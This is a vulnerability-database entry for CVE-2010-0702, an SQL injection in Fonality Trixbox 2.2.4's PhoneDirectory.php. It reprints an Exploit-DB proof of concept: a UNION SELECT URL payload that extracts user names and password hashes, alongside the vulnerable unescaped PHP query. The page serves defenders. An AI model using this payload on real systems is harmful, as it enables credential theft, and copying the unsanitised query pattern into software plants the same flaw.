CVE-2010-0702
Description
SQL injection vulnerability in cisco/services/PhonecDirectory.php in Fonality Trixbox 2.2.4 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Fonality trixbox 2.2.4 - 'PhonecDirectory.php' SQL Injection
# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code :
http://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]
Example (Grab users / password hashes from sugarcrm)
http://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id
PhoneDirectory.php vulnerable code:
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the dial
# key functionality
if ($ID) {
$PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";
$Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
$Query .= "FROM contacts WHERE id = '$ID' ";
$Query .= "ORDER BY last_name ";
$SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);
...
}
#norslacker [at] gmail [dot] com
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| netfortris | trixbox | 2.2.4 | |
References
- http://packetstormsecurity.org/1002-exploits/tribox-sql.txt
- http://www.exploit-db.com/exploits/11508
- http://www.securityfocus.com/bid/38323
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56407
- http://packetstormsecurity.org/1002-exploits/tribox-sql.txt
- http://www.exploit-db.com/exploits/11508
- http://www.securityfocus.com/bid/38323
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56407
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.